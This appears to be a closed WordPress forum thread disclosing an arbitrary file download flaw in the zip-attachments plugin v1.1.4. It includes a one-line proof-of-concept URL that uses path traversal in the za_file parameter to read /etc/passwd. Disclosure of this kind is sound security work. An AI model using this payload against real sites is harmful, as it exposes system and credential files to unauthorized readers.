zip-attachments wordpress plugin v1.1.4 arbitrary file download vulnerability
-
zip-attachments allows arbitrary file downloads because it doesn’t check the download path of the requested file.
PoC:
https://www.example.com/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd
Viewing 7 replies - 1 through 7 (of 7 total)
Viewing 7 replies - 1 through 7 (of 7 total)
- The topic ‘zip-attachments wordpress plugin v1.1.4 arbitrary file download vulnerability’ is closed to new replies.